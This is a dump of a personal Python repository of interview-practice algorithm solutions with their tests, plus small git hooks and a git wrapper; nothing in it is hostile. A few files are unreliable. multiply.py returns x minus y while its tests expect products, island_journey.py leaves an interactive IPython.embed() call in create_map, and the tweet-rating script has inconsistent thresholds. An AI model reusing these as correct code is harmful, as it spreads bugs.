assert t.get(MatrixPosistion(0, 0)) == 5
assert t.sum(MatrixPosistion(0, 0),MatrixPosistion(0, 0)) == 5
# [[1,2,3]
# [2,0,1]]
t.init_sums_matrix([[1, 2, 3], [2, 0, 1]])
assert t.get(MatrixPosistion(0, 0)) == 1
assert t.get(MatrixPosistion(0, 2)) == 3
assert t.sum(MatrixPosistion(0, 0), MatrixPosistion(0, 2)) == 6
assert t.get(MatrixPosistion(1, 2)) == 1
assert t.sum(MatrixPosistion(1, 1), MatrixPosistion(1, 2)) == 1
# [[1,0,3]
# [2,0,1]]
t.set(MatrixPosistion(0, 1), 0)
assert t.get(MatrixPosistion(0, 1)) == 0
assert t.get(MatrixPosistion(0, 2)) == 3
assert t.sum(MatrixPosistion(0, 0), MatrixPosistion(0, 2)) == 4
assert t.sum(MatrixPosistion(0, 0), MatrixPosistion(1, 2)) == 7
assert t.get(MatrixPosistion(1, 2)) == 1
assert t.sum(MatrixPosistion(1, 1), MatrixPosistion(1, 2)) == 1
# [[5,2,3]
# [2,0,1]]
t.set(MatrixPosistion(0, 1), 2)
t.set(MatrixPosistion(0, 0), 5)
assert t.get(MatrixPosistion(0, 0)) == 5
assert t.get(MatrixPosistion(0, 2)) == 3
assert t.sum(MatrixPosistion(0, 0), MatrixPosistion(0, 2)) == 10
assert t.sum(MatrixPosistion(0, 0), MatrixPosistion(1, 2)) == 13
assert t.get(MatrixPosistion(1, 2)) == 1
assert t.sum(MatrixPosistion(1, 1), MatrixPosistion(1, 2)) == 1
if __name__ == '__main__':
run_tests()<file_sep>/file_search.py
# Related blog post - https://algoritmim.co.il/interview-practice/recursive-search-in-a-file-system/
import os
import shutil
def find_files_recur(root, file_name):
def __get_files(folder):
folder_files = os.listdir(folder)
for f in folder_files:
yield os.path.join(folder, f)
def __find_file(f, name):
if not os.path.isdir(f):
if os.path.basename(f) == name:
return f
else:
return __find_file_in_folder(f, name)
def __find_file_in_folder(folder, name):
for f in __get_files(folder):
result = __find_file(f, name)
if result:
return result
return None
return __find_file(root, file_name)
def run_tests(path):
def __before(path):
os.mkdir(path)
file_path = os.path.join(path, "file1.txt")
f = open(file_path, "w+")
f.write("hello!")
subdir = os.path.join(path, "hello")
os.mkdir(subdir)
sub_file_path = os.path.join(subdir, "file2.txt")
f = open(sub_file_path, "w+")
f.write("goodbye")
return file_path, sub_file_path
def __after(path):
shutil.rmtree(path)
file_path, sub_file_path = __before(path)
try:
assert find_files_recur(path, "file1.txt") == file_path
assert find_files_recur(path, "file2.txt") == sub_file_path
assert find_files_recur(path, "hello") is None
except:
print("TESTS FAILED")
finally:
__after(path)
if __name__ == '__main__':
tests_path = "/tmp/file_search_tests"
run_tests(tests_path)
<file_sep>/power_set.py
# Related blog post - https://algoritmim.co.il/2019/06/20/power-set/
def get_padded_bin(num, padded_length):
format_str = '0%db' % padded_length
return format(num, format_str)
def get_all_subsets(group):
group = list(group)
subsets = list()
arr_size = len(group)
max_num = pow(2, arr_size)
for i in range(0, max_num):
current_subset = set()
bin_repr = get_padded_bin(i, arr_size)
for j in range(0, arr_size):
if bin_repr[j] == '1':
current_subset.add(group[j])
subsets.append(current_subset)
return subsets
def run_tests():
for group in [{}, {1, 2, 3}, {"dog", "cat", "mouse", "bird"}]:
print("all the subsets of %s are - " % group)
print(get_all_subsets(group))
if __name__ == '__main__':
run_tests()<file_sep>/calculator/magic_calc.py
from basic_calc import BasicCalculator, OpStr
def is_number(val):
return not isinstance(val, str)
class Config(object):
CONF_1 = 1
CONF_2 = 2
class MagicCalculator(BasicCalculator):
def __init__(self):
super(MagicCalculator, self).__init__()
@staticmethod
def __apply_writing_conv(exp_arr, config):
new_exp = []
i = 0
parenthesis_counter = 0
while i < len(exp_arr):
next_val = exp_arr[i]
new_exp.append(next_val)
if is_number(next_val) and i < len(exp_arr) - 1 and exp_arr[i + 1] == OpStr.PAR_L:
if config == Config.CONF_1:
new_exp.append(OpStr.MUL)
elif config == Config.CONF_2:
parenthesis_counter += 1
number = new_exp.pop()
new_exp.extend([OpStr.PAR_L, number, OpStr.MUL])
elif next_val == OpStr.PAR_R:
parenthesis_counter -= 1
if parenthesis_counter == 0:
new_exp.append(OpStr.PAR_R)
i += 1
return new_exp
def solve(self, exp_arr, config=Config.CONF_1):
exp_arr = self.__apply_writing_conv(exp_arr, config)
return super(MagicCalculator, self).solve(exp_arr)
def run_tests():
calc = MagicCalculator()
assert calc.solve([1, "+", 2]) == 3
assert calc.solve([1, "-", 2]) == -1
assert calc.solve([2, "*", "(", 1, "+", 3, ")"]) == 8
assert calc.solve([2, "*", "(", 1, "+", 6, "/", 3, ")"]) == 6
assert calc.solve([2, "*", "(", 1, "+", 6, "/", 3, ")", "-", "(", 5, "*", 2, ")"]) == -4
assert calc.solve([2, "+", "(", 3, "*", "(", 8, "/", 2, ")", "-", 10, ")"]) == 4
assert calc.solve([8, "/", 2, "(", 2, "+", 2, ")"]) == 16
assert calc.solve([8, "/", 2, "(", 2, "+", 2, ")"], Config.CONF_2) == 1
assert calc.solve([1, "+", "(", 2, "/", 2, "(", 1, "+", 1, ")", "+", 3, ")"]) == 6
assert calc.solve([1, "+", "(", 2, "/", 2, "(", 1, "+", 1, ")", "+", 3, ")"], Config.CONF_2) == 4.5
if __name__ == '__main__':
run_tests()
<file_sep>/nextBigger.py
# Related blog post - https://algoritmim.co.il/2020/05/24/next-bigger-number/
def nextBigger(n):
digits = [int(d) for d in str(n)]
for i in range(len(digits) - 2, -1, -1):
for j in range(len(digits) - 1, i, -1):
if digits[i] < digits[j]:
digits[i], digits[j] = digits[j], digits[i]
digits[i+1:] = sorted(digits[i+1:])
return int(''.join([str(d) for d in digits]))
return -1
def run_tests():
assert nextBigger(12) == 21
assert nextBigger(513) == 531
assert nextBigger(111) == -1
assert nextBigger(1144) == 1414
assert nextBigger(1662) == 2166
if __name__ == '__main__':
run_tests()
<file_sep>/jump_game.py
# Related blog post - https://algoritmim.co.il/2019/06/23/jump-game/
class JumpGame(object):
def __init__(self):
self.jumps = {}
self.arr = None
def can_finish_from_index(self, i):
if i >= len(self.arr):
self.jumps[i] = False
elif i == len(self.arr) - 1:
self.jumps[i] = True
elif self.arr[i] == 0:
self.jumps[i] = False
else:
self.jumps[i] = False
for jump_size in range(1, self.arr[i]+1):
if i + jump_size not in self.jumps:
self.jumps[i + jump_size] = self.can_finish_from_index(i + jump_size)
self.jumps[i] = self.jumps[i] or self.jumps[i + jump_size]
return self.jumps[i]
def can_finish_game(self, arr):
self.arr = arr
return self.can_finish_from_index(0)
def run_tests():
assert JumpGame().can_finish_game([]) is False
assert JumpGame().can_finish_game([0]) is True
assert JumpGame().can_finish_game([1, 2, 0, 3]) is True
assert JumpGame().can_finish_game([2, 1, 0, 1]) is False
if __name__ == '__main__':
run_tests()<file_sep>/ProfilingExample/main.py
from time import sleep
from viztracer import VizTracer
def create_list():
return [1] * 10000000
def remove_from_start(li):
li.pop(0)
def remove_from_end(li):
li.pop(len(li) - 1)
def delete_list(my_list):
while len(my_list) > 0:
remove_from_start(my_list)
remove_from_end(my_list)
if __name__ == '__main__':
tracer = VizTracer()
tracer.start()
my_list = create_list()
delete_list(my_list)
tracer.stop()
tracer.save("profile.json")
<file_sep>/bit_manipulation/get_all_powers_of_two.py
def get_all_powers_of_two(x):
res = []
power_of_two = 1
while power_of_two <= x:
if power_of_two & x != 0:
res.append(power_of_two)
power_of_two = power_of_two << 1
return res
def run_tests():
assert get_all_powers_of_two(330) == [2, 8, 64, 256]
assert get_all_powers_of_two(3) == [1, 2]
assert get_all_powers_of_two(22) == [2, 4, 16]
assert get_all_powers_of_two(0) == []
assert get_all_powers_of_two(1) == [1]
if __name__ == '__main__':
run_tests()
<file_sep>/Mastermind/app/game_logic/player.py
from app.consts import *
def validate_player_guess(player_guess):
valid_input = True
if len(player_guess) != CODE_LENGTH:
print("Guess should be {} colors long".format(CODE_LENGTH))
valid_input = False
for item in player_guess:
if item not in COLORS:
print("Bad input: {}".format(item))
valid_input = False
return valid_input
def format_player_guess(player_guess):
guess = player_guess.split(" ")
formatted_guess = []
for item in guess:
if item in COLORS_DICT:
formatted_guess.append(COLORS_DICT.get(item))
else:
formatted_guess.append(item)
return formatted_guess
def get_player_guess():
guess = format_player_guess(input(USER_INPUT_PROMPT))
valid_input = validate_player_guess(guess)
while not valid_input:
guess = format_player_guess(input(USER_INPUT_PROMPT))
valid_input = validate_player_guess(guess)
return guess
<file_sep>/hello_world/README.md
A collection of simple hello_world implementations in various languages.
Related blog posts - https://algoritmim.co.il/tag/hello_world/
<file_sep>/descriptive_numbers.py
# Related blog post - https://algoritmim.co.il/2019/06/18/descriptive-numbers/
def get_number_description(num):
res = ""
current_count = 1
current_digit = num[0]
for i in range(1, len(num)):
if num[i] == current_digit:
current_count += 1
else:
res = res + str(current_count) + current_digit
current_digit = num[i]
current_count = 1
res = res + str(current_count) + current_digit
return int(res)
def get_nth_descriptive(n):
if n == 1:
return 1
else:
i = 1
current_number = 1
while i < n:
current_number = get_number_description(str(current_number))
i += 1
return current_number
def run_tests():
assert get_nth_descriptive(1) == 1
assert get_nth_descriptive(2) == 11
assert get_nth_descriptive(5) == 111221
assert get_nth_descriptive(10) == 13211311123113112211
if __name__ == '__main__':
run_tests()<file_sep>/dot_files/git_hooks/pre-commit
#!/bin/bash
# Related blog post (in Hebrew) - https://algoritmim.co.il/2019/12/18/git-me-baby-one-more-time
if git diff --cached | grep '^[+d].*NO_COMMIT'; then
echo "Can't commit file with NO_COMMIT comment, remove the debug code and try again"
exit 1
fi<file_sep>/fibsum.py
def fibsum(N):
if N == 0:
return 0
previous = 0
current = 1
while current <= N:
tmp = current
current = current + previous
previous = tmp
########## here current >= A
count = 0
remain = N
while remain >= previous:
count += 1
remain -= previous
return count + fibsum(remain)
if __name__ == '__main__':
assert fibsum(0) == 0
assert fibsum(2) == 1
assert fibsum(8) == 1
assert fibsum(11) == 2
assert fibsum(12) == 3
<file_sep>/palindrome.py
# Related blog post - https://algoritmim.co.il/2020/02/03
def is_palindrome_v1(word):
word = str(word)
i = 0
j = len(word) - 1
while i < j:
if word[i] != word[j]:
return False
i += 1
j -= 1
return True
def _is_palindrome_recur(word):
if len(word) <= 1:
return True
if word[0] != word[-1]:
return False
return _is_palindrome_recur(word[1:-1])
def is_palindrome_v2(word):
return _is_palindrome_recur(str(word))
def run_tests():
for func in [is_palindrome_v1, is_palindrome_v2]:
assert func("a") is True
assert func("aba") is True
assert func("abba") is True
assert func("dog") is False
assert func(123) is False
assert func(123321) is True
if __name__ == '__main__':
run_tests()
<file_sep>/anagrams.py
# Related blog post - https://algoritmim.co.il/2019/07/17/anagrams/
import string
from collections import defaultdict
def get_word_key(word):
hist = defaultdict(int)
for c in word:
hist[c] += 1
str_hist = ""
for c in string.ascii_letters:
str_hist += "%s%d" % (c, hist[c])
return ''.join(str_hist)
def find_anagrams(arr):
results = defaultdict(list)
for i in range(0, len(arr)):
word = arr[i]
word_key = get_word_key(word)
results[word_key].append(i + 1)
return list(results.values())
def run_tests():
assert find_anagrams(["dog", "god", "odg"]) == [[1,2,3]]
assert find_anagrams(["dog", "cat", "god", "odg"]) == [[1,3,4], [2]]
assert find_anagrams(["dog"]) == [[1]]
assert find_anagrams(["dog", "dog"]) == [[1, 2]]
assert find_anagrams(["dog", "Dog"]) == [[1], [2]]
assert find_anagrams(["dog", "cat", "toy", "boy"]) == [[1], [2], [3], [4]]
if __name__ == '__main__':
run_tests()<file_sep>/four_in_a_row/board.py
# Related blog post - https://algoritmim.co.il/just-code/connect-four-game-in-python/
from enum import Enum
ROWS = 6
COLUMNS = 9
class Color(Enum):
EMPTY = 0
RED = 1
BLUE = 2
def __str__(self):
return '%s' % self.value
class BoardUtils:
@staticmethod
def get_row_vector(board, row, column):
start = max(0, column - 3)
end = min(board.columns-1, column + 3)
vector = []
for c in range(start, end + 1):
vector.append(board.get(row, c))
return vector
@staticmethod
def get_column_vector(board, row, column):
start = max(0, row - 3)
end = min(board.rows-1, row + 3)
vector = []
for r in range(start, end + 1):
vector.append(board.get(r, column))
return vector
@staticmethod
def get_positive_diagonal_vector(board, row, column):
start_row = row - 3
start_column = column - 3
end_row = row + 3
end_column = column + 3
vector = []
r = start_row
c = start_column
while r <= end_row and c <= end_column:
vector.append(board.get(r, c))
r += 1
c += 1
return vector
@staticmethod
def get_negative_diagonal_vector(board, row, column):
start_row = row + 3
start_column = column - 3
end_row = row - 3
end_column = column + 3
vector = []
r = start_row
c = start_column
while r >= end_row and c <= end_column:
vector.append(board.get(r, c))
r -= 1
c += 1
return vector
class Board:
def __init__(self, rows=ROWS, columns=COLUMNS, state=None):
self.rows = rows
self.columns = columns
if state is None:
self.init_empty_board()
else:
self.state = state
def __repr__(self):
result = ""
for r in range(self.rows - 1, -1, -1):
row = " ".join([str(self.state[r][c]) for c in range(0, self.columns)])
result += row + '\n'
return '\n' + result + '\n'
def init_empty_board(self):
self.state = [[Color.EMPTY for _ in range(0, self.columns)] for _ in range(0, self.rows)]
@classmethod
def read(cls, input_board):
rows = len(input_board)
columns = len(input_board[0])
board_state = []
for r in range(rows - 1, -1, -1):
board_state.append(input_board[r])
return Board(rows, columns, board_state)
def get(self, r, c):
return self.state[r][c] if r >=0 and r < self.rows and c >= 0 and c < self.columns else Color.EMPTY
def set(self, r, c, val):
self.state[r][c] = val
<file_sep>/island_journey.py
class Island(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return self.name
class Bridge(object):
def __init__(self, I1, I2, danger_grade):
self.I1 = I1
self.I2 = I2
self.danger_grade = danger_grade
def __repr__(self):
return str(self.danger_grade)
def add_bridge_islands(map_v, bridge):
for island_set in map_v:
found_i1 = bridge.I1 in island_set
found_i2 = bridge.I2 in island_set
if found_i1 and found_i2:
return 0
if found_i1 and not found_i2:
island_set.add(bridge.I2)
return 1
elif found_i2 and not found_i1:
island_set.add(bridge.I1)
return 1
map_v.append({bridge.I1, bridge.I2})
return 2
def create_map(V, E):
if len(V) <= 1:
return E
import IPython
IPython.embed()
ordered_bridges = sorted(E, key=lambda x: x.danger_grade)
islands_count = 0
map_e = list()
map_v = list()
for bridge in ordered_bridges:
added_islands = add_bridge_islands(map_v, bridge)
if added_islands:
map_e.append(bridge)
islands_count += added_islands
if islands_count == len(V) and len(map_v) == 1:
break
return list(map_e)
def run_tests():
A = Island("A")
B = Island("B")
C = Island("C")
D = Island("D")
V = [A, B, C, D]
#
# e_1 = Bridge(A,B,1)
# e_2 = Bridge(A,D,6)
# e_3 = Bridge(A,C,2)
# e_4 = Bridge(B,C,3)
# e_5 = Bridge(D,C,8)
# E = [e_1, e_2, e_3, e_4, e_5]
# assert create_map(V,E) == [e_1,e_3,e_2]
e_1 = Bridge(A,B,1)
e_2 = Bridge(A,D,3)
e_3 = Bridge(A,C,10)
e_4 = Bridge(B,C,4)
e_5 = Bridge(D,C,2)
E = [e_1, e_2, e_3, e_4, e_5]
print (create_map(V,E))
assert create_map(V,E) == [e_1,e_5,e_3]
if __name__ == '__main__':
run_tests()<file_sep>/bit_manipulation/check_bit_set.py
def bit_set(x, y):
mask = 1 << (y - 1)
return (x & mask) != 0
def run_tests():
assert bit_set(5, 1) is True
assert bit_set(5, 2) is False
assert bit_set(5, 3) is True
assert bit_set(15, 3) is True
assert bit_set(0, 3) is False
assert bit_set(0, 30) is False
if __name__ == '__main__':
run_tests()
<file_sep>/recursion/memoizedFib.py
from datetime import datetime
def memoized_fib(n):
results_cache = {}
def fib(num):
if num in results_cache:
return results_cache[num]
else:
if num <= 2:
res = 1
else:
res = fib(num - 1) + fib(num - 2)
results_cache[num] = res
return res
return fib(n)
def run(n):
start_time = datetime.now()
res = memoized_fib(n)
print("Calculating fib(%d) = %d took %s seconds" % (n, res, datetime.now() - start_time))
if __name__ == '__main__':
run(2)
run(5)
run(10)
run(50)
run(100)
run(500)
run(1000)
<file_sep>/dot_files/git_hooks/pre-merge-commit
#!/bin/bash
# Related blog post (in Hebrew) - https://algoritmim.co.il/2019/12/18/git-me-baby-one-more-time
# Get the current branch name
branch_name=$(git branch | grep "*" | sed "s/\* //")
# if the merged branch was master - don't do anything
if [[ $branch_name = "master" ]]; then
echo "Preparing to merge to master..."
if git diff --cached | grep '^[+d].*NO_MERGE'; then
echo "Can't merge branch with 'NO_MERGE' comment, fix what you need and try again!"
exit 1
fi
fi<file_sep>/Mastermind/tests/game_locig/test_check_player_guess_with_duplicates.py
from collections import Counter
from app.game_logic.checkers import check_player_guess_with_duplicates
def test_check_duplicates_in_guess_not_scored_twice():
code = ["red", "blue", "green"]
guess1 = ["red", "red", "red"]
assert check_player_guess_with_duplicates(code, guess1) == (1, 0)
guess2 = ["blue", "blue", "blue"]
assert check_player_guess_with_duplicates(code, guess2) == (1, 0)
guess3 = ["blue", "blue", "red"]
assert check_player_guess_with_duplicates(code, guess3) == (1, 1)
<file_sep>/Mastermind/app/consts.py
COLORS = ["red", "blue", "green", "purple", "orange", "yellow"]
COLORS_DICT = {color[0]: color for color in COLORS}
CODE_LENGTH = 2
TOTAL_ROUNDS = 12
USER_INPUT_PROMPT = "Please enter your next guess. (r=red b=blue g=green p=purple o=orange y=yellow\n"
USER_SCORE = "Bul: {}, Pgia: {}\n"
USER_WON = "You Win!"
USER_LOST = "You Lose!"
<file_sep>/dot_files/git_wrapper
#!/bin/bash
function git {
if [[ "$1" = "merge" && "$@" != *"--help"* && "$@" != *"--abort"* ]]; then
git_merge_wrapper "$@";
else
command git "$@"
fi
}
function git_merge_wrapper {
command git "$@"
ret_code=$?
if [[ "$ret_code" != 0 ]]; then
command git merge --abort
fi
}<file_sep>/ice_cream.py
# Related blog post - https://algoritmim.co.il/2019/07/18/ice-cream/
class IceCreamChooser(object):
def __init__(self, ice_cream_costs):
self.ice_cream_costs = ice_cream_costs
def choose_ice_cream_once(self, money):
raise NotImplementedError
def choose_ice_cream(self, money_sums):
results = []
for money in money_sums:
results.append(self.choose_ice_cream_once(money))
return results
class IceCreamChooseLimitedVisits(IceCreamChooser):
def choose_ice_cream_once(self, money):
diff_to_cost = {}
for i in range(0, len(self.ice_cream_costs)):
cost = self.ice_cream_costs[i]
if cost in diff_to_cost:
return diff_to_cost[cost], i
else:
diff = money - cost
diff_to_cost[diff] = i
class IceCreamChooseManyVisits(IceCreamChooser):
def __init__(self, ice_cream_costs):
super(IceCreamChooseManyVisits, self).__init__(ice_cream_costs)
self.all_possible_costs_sums = self.preprocess_ice_cream_costs()
def preprocess_ice_cream_costs(self):
all_possible_costs_sums = {}
for i in range(0, len(self.ice_cream_costs)):
for j in range(i + 1, len(self.ice_cream_costs)):
costs_sum = self.ice_cream_costs[i] + self.ice_cream_costs[j]
all_possible_costs_sums[costs_sum] = (i, j)
return all_possible_costs_sums
def choose_ice_cream_once(self, money):
return self.all_possible_costs_sums[money]
def choose_ice_cream_flavours(ice_cream_costs, money_sums):
if len(money_sums) >= len(ice_cream_costs):
return IceCreamChooseManyVisits(ice_cream_costs).choose_ice_cream(money_sums)
else:
return IceCreamChooseLimitedVisits(ice_cream_costs).choose_ice_cream(money_sums)
def run_tests():
assert choose_ice_cream_flavours([2, 5, 3, 1], [3, 8]) == [(0, 3), (1, 2)]
assert choose_ice_cream_flavours([2, 5, 3, 1], [3, 8, 7, 6, 5]) == [(0, 3), (1, 2), (0, 1), (1, 3), (0, 2)]
assert choose_ice_cream_flavours([2, 5, 3.5, 4, 4.5, 1.5, 2.5, 0.5], [3, 8]) == [(6, 7), (2, 4)]
assert choose_ice_cream_flavours([1, 2, 3], [3, 3, 3, 4, 5, 3, 4]) == [(0, 1), (0, 1), (0, 1), (0, 2), (1, 2),
(0, 1), (0, 2)]
assert choose_ice_cream_flavours([2, 5, 3.5, 4, 4.5, 1.5, 2.5, 0.5], [3.5]) == [(0,5)]
if __name__ == '__main__':
run_tests()
<file_sep>/ProfilingExample/rate_tweets.py
import pandas as pd
import timeit
class Fields:
LIKES_FIELD = 'nlikes'
POPULARITY_FIELD = 'tweet_popularity'
def rate_tweet_popularity(num_likes):
if num_likes <= 50:
return 'low'
if 50 < num_likes <= 500:
return 'medium'
if num_likes > 500:
return 'high'
def run_with_iter(df):
tweet_popularity = []
for i, row in df.iterrows():
tweet_popularity.append(rate_tweet_popularity(row[Fields.LIKES_FIELD]))
df[Fields.POPULARITY_FIELD] = tweet_popularity
def run_with_apply(df):
df[Fields.POPULARITY_FIELD] = df.apply(lambda row: rate_tweet_popularity(row[Fields.LIKES_FIELD]), axis=1)
def run_with_vectors(df):
df[Fields.POPULARITY_FIELD] = 0
df.loc[(df[Fields.LIKES_FIELD] <= 50), Fields.POPULARITY_FIELD] = 'low'
df.loc[(50 <= df[Fields.LIKES_FIELD]) & (df[Fields.LIKES_FIELD] < 500), Fields.POPULARITY_FIELD] = 'medium'
df.loc[(500 < df[Fields.LIKES_FIELD]), Fields.POPULARITY_FIELD] = 'high'
if __name__ == '__main__':
data_set = pd.read_csv('~/Downloads/elon-musk/2020.csv')
print("Method run_with_vectors finished in", timeit.timeit(
"run_with_vectors(data_set)", globals=globals(), number=1
), "ms")
print("Popularity results: \n", data_set[Fields.POPULARITY_FIELD].value_counts())
<file_sep>/bit_manipulation/check_all_bits_set.py
def exact_bit_set(x, y, z):
n1 = 1 << (x - 1)
n2 = 1 << (y - 1)
N = n1 | n2
return z == N
def run_tests():
assert exact_bit_set(2, 8, 20) is False
assert exact_bit_set(1, 3, 20) is False
assert exact_bit_set(1, 3, 5) is True
assert exact_bit_set(1, 11, 1025) is True
if __name__ == '__main__':
run_tests()
<file_sep>/bit_manipulation/find_single_number.py
def find_single_number(arr):
result = arr[0]
for n in arr[1:]:
result = result ^ n
return result
def run_tests():
arr = [0]
assert find_single_number(arr) == 0
arr = [1, 1, 2, 3, 3]
assert find_single_number(arr) == 2
arr = [2, 1, 1, 3, 3, 1, 1]
assert find_single_number(arr) == 2
if __name__ == '__main__':
run_tests()
<file_sep>/hello_world/hello_world_python.py
def hello_world():
space_counter = 0
s = "Hello World"
for c in s:
print(" " * space_counter + c)
space_counter += 1
if __name__ == '__main__':
hello_world()<file_sep>/Mastermind/app/game_logic/checkers.py
from collections import Counter
def check_player_guess_no_duplicates(code, guess):
code_set = set(code)
bul = 0
pgia = 0
for i in range(0, len(guess)):
color = guess[i]
if color == code[i]:
bul += 1
elif color in code_set:
pgia += 1
return bul, pgia
def check_player_guess_with_duplicates(code, guess):
code_counter = Counter(code)
bul = 0
pgia = 0
for i in range(0, len(guess)):
color = guess[i]
if color == code[i]:
bul += 1
decrease_color(code_counter, color)
for i in range(0, len(guess)):
color = guess[i]
if color in code_counter:
pgia += 1
decrease_color(code_counter, color)
return bul, pgia
def decrease_color(code_counter, color):
if color in code_counter:
updated_color_count = code_counter.pop(color) - 1
if updated_color_count > 0:
code_counter[color] = updated_color_count
<file_sep>/longest_k_unique.py
# Related blog post - https://algoritmim.co.il/2019/07/04/k-unique-sequence/
import copy
from collections import defaultdict
def find_longest_k_unique(arr, k):
longest_k_uniuqe = []
if len(arr) == 1:
return arr
else:
i = j = 0
current_k_unique = [arr[i]]
current_range = defaultdict(int)
current_range[arr[i]] += 1
unique_count = len(current_range.keys())
while j < len(arr)-1:
if unique_count <= k:
j += 1
current_k_unique.append(arr[j])
current_range[arr[j]] += 1
else:
del current_k_unique[0]
current_range[arr[i]] -= 1
if current_range[arr[i]] == 0:
current_range.pop(arr[i])
i += 1
unique_count = len(current_range.keys())
if unique_count == k:
if len(current_k_unique) > len(longest_k_uniuqe):
longest_k_uniuqe = copy.deepcopy(current_k_unique)
return longest_k_uniuqe
def run_tests():
arr = [1, 5, 3, 100, 3, 2, 2]
k=1
assert find_longest_k_unique(arr, k) == [2,2]
k=2
assert find_longest_k_unique(arr, k) == [3,100,3]
k = 3
assert find_longest_k_unique(arr, k) == [3,100,3,2,2]
arr = [1, 2, 3, 4]
k=1
assert find_longest_k_unique(arr,k) == [2]
k=2
assert find_longest_k_unique(arr,k) == [1,2]
if __name__ == '__main__':
run_tests()<file_sep>/maze.py
# Related blog post - https://algoritmim.co.il/2019/06/18/maze-path/
class MazeCell(object):
def __init__(self, i, j, is_wall=False, is_exit=False):
self.i = i
self.j = j
self.visited = False
self.is_wall = is_wall
self.is_exit = is_exit
def __eq__(self, other):
return self.i == other.i and self.j == other.j
def __repr__(self):
repr = "%d,%d" % (self.i, self.j)
if self.visited:
repr += ',visited'
if self.is_exit:
repr += ' (EXIT)'
return repr
class Maze(object):
def __init__(self, maze_matrix):
self.maze = maze_matrix
self.cells_cache = {}
self.rows = len(maze_matrix)
self.columns = len(maze_matrix[0])
def find_path_to_exit_in_maze(self, start_cell):
path = [start_cell]
while len(path) > 0:
current_cell = path[-1]
current_cell.visited = True
adjacent_cell = self.get_available_adjacent_cell(current_cell)
if adjacent_cell is None:
path.pop()
else:
path.append(adjacent_cell)
if adjacent_cell.is_exit:
return path
return -1
def get_cell(self, i, j):
if (i,j) not in self.cells_cache:
self.cells_cache[(i,j)] = MazeCell(i, j, self.maze[i][j] == 1, self.maze[i][j] == "EXIT")
return self.cells_cache[(i,j)]
def get_available_adjacent_cell(self, cell):
for (i, j) in [(cell.i - 1, cell.j), (cell.i, cell.j - 1), (cell.i + 1, cell.j), (cell.i, cell.j + 1)]:
if 0 <= i < self.rows and 0 <= j < self.columns:
adj = self.get_cell(i,j)
if adj.visited or adj.is_wall:
continue
else:
return adj
return None
def run_tests():
maze_matrix = [[1, "ENTERANEC", 1, 1],
[1, 0, 0, 1],
[1, 0, 1, 1],
[1, 0, 0, 1],
[1, 1, "EXIT", 1]]
maze = Maze(maze_matrix)
expected_path = [MazeCell(0, 1), MazeCell(1, 1), MazeCell(2, 1), MazeCell(3, 1), MazeCell(3, 2),
MazeCell(4, 2, is_exit=True)]
assert maze.find_path_to_exit_in_maze(MazeCell(0, 1)) == expected_path
maze_matrix = [[1, "ENTERANEC", 1, 1],
[1, 0, 0, 1],
[1, 1, 1, 1],
[1, 0, 0, 1],
[1, 1, "EXIT", 1]]
maze = Maze(maze_matrix)
assert maze.find_path_to_exit_in_maze(MazeCell(0, 1)) == -1
maze_matrix = [[1, "ENTERANEC", 1, 1],
[1, 1, "EXIT", 1]]
maze = Maze(maze_matrix)
assert maze.find_path_to_exit_in_maze(MazeCell(0, 1)) == -1
maze_matrix = [[1, "ENTERANEC", 1, 1],
[1, "EXIT", 1, 1]]
maze = Maze(maze_matrix)
expected_path = [MazeCell(0, 1), MazeCell(1, 1, is_exit=True)]
assert maze.find_path_to_exit_in_maze(MazeCell(0, 1)) == expected_path
maze_matrix = [["ENTERANEC", 0, 0, "EXIT"]]
maze = Maze(maze_matrix)
expected_path = [MazeCell(0, 0), MazeCell(0, 1), MazeCell(0, 2), MazeCell(0,3, is_exit=True)]
assert maze.find_path_to_exit_in_maze(MazeCell(0, 0)) == expected_path
if __name__ == '__main__':
run_tests()
<file_sep>/README.md
# maya_solves
Solutions to programming problems
This repository holds solutions and tests to programming problems I solved practicing for job interviews!
Full written steps to solutions (in hebrew) can be found here -
https://algoritmim.co.il
Enjoy!
<file_sep>/hello_world/hello_world_python_rec.py
def print_diag(spaces, word):
if len(word) > 0:
print(spaces + word[0])
print_diag(spaces + " ", word[1:])
if __name__ == '__main__':
print_diag("", "Hello World!")
<file_sep>/multiply.py
# Related blog post -
def multiply(x,y):
return 1*x-y
def run_tests():
assert multiply(5,5) == 25
assert multiply(0,5) == 0
assert multiply(1,5) == 5
assert multiply(-5,5) == -25
assert multiply(0.5,5) == 2.5
if __name__ == '__main__':
run_tests()
<file_sep>/merge_meetings.py
# Related blog post - https://algoritmim.co.il/2019/07/06/merge-meetings/
class Meeting(object):
def __init__(self, start, end):
self.start_time = start
self.end_time = end
def __lt__(self, other):
return self.start_time < other.start_time
def __eq__(self, other):
return self.start_time == other.start_time and self.end_time == other.end_time
def __repr__(self):
return "(%d,%d)" % (self.start_time, self.end_time)
def merge_meetings(arr):
if len(arr) <= 1:
return arr
arr.sort()
res = [arr[0]]
previous_meeting = arr[0]
for i in range(1, len(arr)):
new_meeting = arr[i]
if new_meeting.start_time <= previous_meeting.end_time:
previous_meeting.end_time = new_meeting.end_time
else:
res.append(new_meeting)
previous_meeting = new_meeting
return res
def run_tests():
arr = [Meeting(3, 4), Meeting(0, 2)]
assert merge_meetings(arr) == [Meeting(0, 2), Meeting(3, 4)]
arr = [Meeting(3, 4), Meeting(0, 2), Meeting(1, 3)]
assert merge_meetings(arr) == [Meeting(0, 4)]
arr = [Meeting(0, 1), Meeting(3, 5), Meeting(4, 8), Meeting(10, 12), Meeting(9, 10)]
assert merge_meetings(arr) == [Meeting(0, 1), Meeting(3, 8), Meeting(9, 12)]
if __name__ == '__main__':
run_tests()
<file_sep>/bit_manipulation/get_revers_bits.py
def revers_bits(x):
result = 0
for i in range(0, 32):
current_bit = x >> i & 1
result = result | current_bit << (32 - i - 1)
return result
def run_tests():
assert revers_bits(0) == 0
assert revers_bits(1) == pow(2, 31)
assert revers_bits(pow(2, 31)) == 1
assert revers_bits(pow(2, 31) + 1) == pow(2, 31) + 1
if __name__ == '__main__':
run_tests()
<file_sep>/code_jam/2018/senate_evacuation.py
# Related blog post - https://algoritmim.co.il/2019/11/23/senate-evacuation/
import string
def remove_senators(senators_counter, senators_to_evict):
for senator in senators_to_evict:
senators_counter[senator] -= 1
if senators_counter[senator] == 0:
senators_counter.pop(senator)
def format_results(eviction_plan_list):
eviction_plan_list = ["".join(senators) for senators in eviction_plan_list]
return " ".join(eviction_plan_list)
def choose_next_to_evict(senators_counter):
if len(senators_counter) == 2:
return list(senators_counter.keys())
else:
return [max(senators_counter, key=senators_counter.get)]
def evict_the_senate_iter(senators_counter):
eviction_plan = []
